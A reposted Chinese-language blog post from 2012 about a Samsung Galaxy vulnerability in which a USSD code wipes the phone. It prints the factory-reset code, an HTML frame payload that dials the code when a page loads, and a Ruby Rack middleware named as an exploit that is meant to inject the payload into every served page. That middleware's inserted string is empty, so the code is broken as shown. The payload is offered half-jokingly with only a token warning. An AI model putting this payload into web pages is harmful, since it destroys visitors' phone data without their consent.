SAMSUNG 包括 GALAXY S3 等数款智慧型手机存在严重的安全漏洞, 一行 USSD 代码就能格式化手机甚至毁损 SIM 卡!
目前确定有问题的手机如下:
Galaxy S3, Galaxy S2, Galaxy Ace, Galaxy Beam, Galaxy S
安全专家 Ravi Borgaonkar 于 Ekoparty security conference 中表示, SAMSUNG 旗下智慧型手机包括 SAMSUNG GALAXY S III, GALAXY S II, GALAXY Beam, GALAXY S Advance 与 GALAXY Ace, 只要使用者开启经由短信, NFC 近距离感应, 甚至是 QR code 所发送的一段 USSD 代码, 就能轻松格式化你的智慧型手机.
ok, 说了那么多, 关键的 USSD code 是啥勒??答案揭晓~~
*2767*3855#
也就是让你的手机自动播出 *2767*3855#
当然你也可以写在网页里面.
<frame src='tel:*2767*3855%23'/>
请参考简易 Rails 程式码.
2012/09/26 17:30 Update:
Rails程式码被移除了, 这边简单来一份吧
请勿用于非法用途.
module Rack
class GalaxyS3Exploit
def initialize(app)
@app = app
end
def call(env)
res = @app.call(env)
if res[1]['Content-Type'] =~ /text\/html/
res.tap do |res|
orig = res[2]
res[2] = [].tap do |body|
orig.each do |line|
body << line.sub(/(?=<\/body>)/, "")
end
orig.close if orig.respond_to?(:close)
res[1]['Content-Length'] = body.join.size.to_s if res[1]['Content-Length']
end
end
else
res
end
end
end
end
转自:http://blog.vis.tw/?p=67&variant=zh-cn
留言评论(旧系统):